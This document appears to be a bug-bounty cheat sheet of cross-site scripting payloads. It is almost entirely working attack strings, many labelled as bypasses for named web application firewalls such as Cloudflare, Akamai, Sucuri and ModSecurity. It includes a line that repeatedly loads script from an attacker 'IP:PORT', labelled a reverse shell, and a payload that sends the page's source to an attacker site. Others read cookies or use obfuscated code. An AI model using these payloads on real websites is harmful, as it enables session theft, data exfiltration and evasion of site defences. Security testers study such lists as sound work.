jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e | |
Hi'>"<script src="//xss-server"></script><x="{9*9}\r\n%0a%09%0d<svg\onload=confirm(1)> | |
<x/onclick=alert``> | |
"><img src onerror=alert(1)> | |
<--`<img/src=` onerror=alert(3)> --!> | |
" autofocus onfocus=alert(4) fragment=" | |
" onclick=alert`5` fragment=" | |
<details/open ontoggle=alert(6)> | |
<svg/onload=alert`7`> | |
><svg/onload=confirm``>" | |
</div><img/**/src/**/onerror=alert(1)> | |
<Svg%K9OnLoad=%7Krompt%6K1%6K> | |
"'`><svg/onload=alert`1234`> | |
๐='',๐บ=!๐+๐,๐=!๐บ+๐,๐บ=๐+{},๐=๐บ[๐++], | |
๐=๐บ[๐ซ=๐],๐=++๐ซ+๐,๐น=๐บ[๐ซ+๐],๐บ[๐น+=๐บ[๐] | |
+(๐บ.๐+๐บ)[๐]+๐[๐]+๐+๐+๐บ[๐ซ]+๐น+๐+๐บ[๐] | |
+๐][๐น](๐[๐]+๐[๐ซ]+๐บ[๐]+๐+๐+"(๐)")() | |
<script>setInterval(function(){d=document;z=d.createElement("script");z.src="//IP:PORT";d.body.appendChild(z)},0)</script> ==> reverse Shell | |
<iframe/src=j%0aa%0av%0aa%0as%0ac%0ar%0ai%0ap%0t:prompt `1`> --> test it | |
"><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> --> ModSecurity bypass | |
javascript:alert(1) | |
'-alert(1)-' | |
'-alert(1)// | |
`-alert(1)//\ | |
\'-alert(1)// | |
'}alert(1);{' | |
'}alert(1)%0A{' | |
\'}alert(1);{// | |
\u0027-confirm`1`-\u0027 | |
"; ||confirm('XSS') || " | |
'*prompt(1)*' | |
${alert(1)} | |
{{32*32}} | |
""});});});alert(1);$('a').each(function(i){$(this).click(function(event){x({y | |
"])},alert(1));(function xss() {// | |
'?prompt`1`?' | |
" onmouseover=alert(/@darknetguy/) | |
" onclick=alert(1)//">click | |
" autofocus onfocus=alert(1) " | |
" onfocus=prompt(1) autofocus fragment=" | |
" onfocus=prompt(1) onmouseover="confirm(1) " style="position:absolute;width:100%;height:100%;top:0;left:0;" | |
" onmousemove=alert(/@darknetguy/)//">Milad | |
"><svg onload=alert(1)>.gif | |
http://www.<svg/onload=ConFirm`1`>.com | |
"><svg/onload=confirm(1)>" | |
<form action=javascript:alert(1)// | |
<form><button formaction=javascript:alert(1)>xss | |
<form><iframe 	  src="javascript:alert(1)" 	;> | |
<form id="test" /><button form="test" formaction="javascript:alert()">xss | |
<object data="data:text/html,<script>alert(5)</script>"> | |
<iframe srcdoc="<svg onload=alert(4);>"> | |
<object data=javascript:alert(3)> | |
<iframe src=javascript:alert(2)> | |
<embed src=javascript:alert(1)> | |
<iframe src='jAvAsCripT:(alert)()'></iframe> | |
<script%20~~~>\u0061\u006C\u0065\u0072\u0074``</script%20~~~> | |
<?tag x="-->" test="<img src=x onerror=alert(1)//"> | |
bypass alert filter: | |
(alert)(1) | |
a=alert,a(2) | |
[3].find(alert) | |
al\u0065rt(4) | |
alert`5` | |
[6].map(alert) | |
[7].every(alert) | |
[8].filter(alert) | |
[9].findIndex(alert) | |
[10].forEach(alert) | |
self['alert'](11) | |
parent['alert'](12) | |
window['alert'](13) | |
Wordfence 7.4.2 | |
<a href=javascript:alert(1)> | |
Sucuri CloudProxy (POST only) | |
<a href=javascript:confirm(1)> | |
ModSecurity CRS 3.2.0 PL1 | |
<a href="jav%0Dascript:alert(1)"> | |
<iframe/onload="var b = 'document.domain)'; var a = 'JaV' + 'ascRipt:al' + 'ert(' + b; this['src']=a"> | |
<script>eval(location.hash.slice(2))</script> and end of url ==> #alert("testtesttestets") | |
<script> | |
x='<%' | |
</script> %>/ | |
alert(2) | |
</script> | |
/<img%20id=%26%23x101;%20src=x%20onerror=%26%23x101;;alert`1`;> ---> cloudflare {`XSSยด} ยซbyPASSยป | |
/<svg%0Aonauxclick=0;[1].some(confirm)// | |
<svg/onload="(new Image()).src='//'%2Bdocument.documentElement.innerHTML"> ===> send current page's source to attacker site | |
===> use < diffrent way | |
">'><details/open/ontoggle=confirm('XSS')> ===> maybe WAF bypasser (Test it) | |
<object/data="javascript:alert/**/(document.domain)">// ===> Bypass CloudFront WAF | |
%3c<aa+ONLOAD+href=javasONLOADcript:promptONLOAD(1)%3e ===> maybe WAF bypasser (Test it) | |
<iframe src="%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aalert(0)"> ===> maybe WAF bypasser (Test it) | |
"><input/onauxclick="[1].map(prompt)"> ==> Sucuri WAF XSS bypass | |
<--`<img%2fsrc%3d` onerror%3dalert(document.domain)> --!> ===> CloudFront XSS bypass | |
1'"><img/src/onerror=.1|alert``> ===> Cloudflare #XSS #Bypass via dot | |
<img%20id=%26%23x101;%20src=x%20onerror=%26%23x101;;alert`1`;> | |
<select><noembed></select><script x=โa@bโa>y=โa@bโ//a@b%0a\u0061lert(1)</script x> | |
<a+HREF=โ%26%237javascrip%26%239t:alert%26lpar;document.domain)โ> | |
<!--><svg onload=alert(1)--> ===> bypass if comments are allowed | |
<svg onload="alert(1)" <="" svg="" | |
<svg onload=alert(1)// | |
<sVg/oNloAd=โJaVaScRiPt:/**\/*\โ/โ\eval(atob(โY29uZmlybShkb2N1bWVudC5kb21haW4pOw==โ))โ> | |
<iframe src=jaVaScrIpT:eval(atob(โY29uZmlybShkb2N1bWVudC5kb21haW4pOw==โ))> | |
** ๐๐ธ๐ฎ๐บ๐ฎ๐ถ [๐๐ข๐ก๐ ๐ฆ๐ถ๐๐ฒ ๐๐ฒ๐ณ๐ฒ๐ป๐ฑ๐ฒ๐ฟ] ๐ช๐๐ ๐๐๐ฝ๐ฎ๐๐ ** | |
<tiger/onpointerrawupdate=this['innerHTML']=unescape(location.hash);>XSS Me#<img src=x onerror=alert(0)> | |
<a href=โj	a	v	asc
ri	pt:\u0061\u006C\u0065\u0072\u0074(this[โdocumentโ][โcookieโ])โ>X</a> ==> Cloudflare Bypass | |
javascript:โ/*โ/*`/* โ<html \โ onmouseover=/*<svg/*/onload=alert()//> | |
<marquee+loop=1+width=0+onfinish='new+Function`al\ert\`1\``'> ===> Akamai waf bypass | |
</script><svg><script>alert(1)%0A--> ===> It must land where JS syntax is not affected though | |
<link rel=import href='./"><svg%20onload=alert(domain)>'> | |
<iframe src="javascript:alert(1)%%0D3C!-- | |
<iframe src="javascript:alert(1)%%0D3C-- | |
"><block%quote oncontextmenu%3Dconfirm(1)>Right click me</blockquote><!-- | |
<--` <body/onload=<!-->
alert(1)> --!> | |
i\{\<\/\s\t\y\le\>\<\i\m\g\20\o\ne\r\r\o\r\=\'a\le\r\t\(\1\)\'\s\rc\=\'e\'\20\>{ | |
<script src=data:,alert(1)> | |"><svg onload=alert(1)>?a=reader | |
xโ</title><img src%3dx onerror%3dalert(1)> | |
<IMG SRC=javascript:alert("XSS")> | |
/</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/* | |
<dETAILS%0Aopen%0AonToGgle%0A=%0Aa=prompt,a() x> | |
<svg onunload='javascript:alert(1)')> | |
XSS'\x22"%22>4<%\u0022/* ===> locator! | |
<ScRiPt src=> | |
<style/onload=alert(0)> | |
%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aalert(0) ==> injecting into src attributes, you need a javascript URI payload | |
===> AWS WAF bypass | |
{` <body \< onscroll =1(_=prompt,_(String.fromCharCode(88,83,83,32,66,121,32,77,111,114,112,104,105,110,101)))> ยด} ==> cloudflare ยซXSSยป payload to bypass protection | |
IE weird behavior: | |
<iframe id=element></iframe> | |
<script> | |
element.alert(1) | |
</script> | |
parentheses free payload by @aemkei | |
<script> | |
onload=setTimeout | |
Event.prototype.toString= | |
_=>"alert\501\51" | |
</script> | |
<</div>script</div>>alert()<</div>/script</div>> | |
<</div> %3c script</div>>alert()<<</div>/script</div> | |
</ScRiPt><img src=something onauxclick="new Function `al\ert\`xss\``"> | |
#Akamai #Bypass #XSS #BugBounty | |
Found a working #xss payload after a brainstorming for a long #time. | |
#Tested in many sites with alexa ranking below #1000 | |
Cloudflare WAF working again... | |
Dec: <svg onload=prompt%26%230000000040document.domain)> | |
Hex: <svg onload=prompt%26%23x000000028;document.domain)> | |
One to bypass Cloudflare WAF by @JacksonHHax | |
<svg onload=alert%26%230000000040"1")> | |
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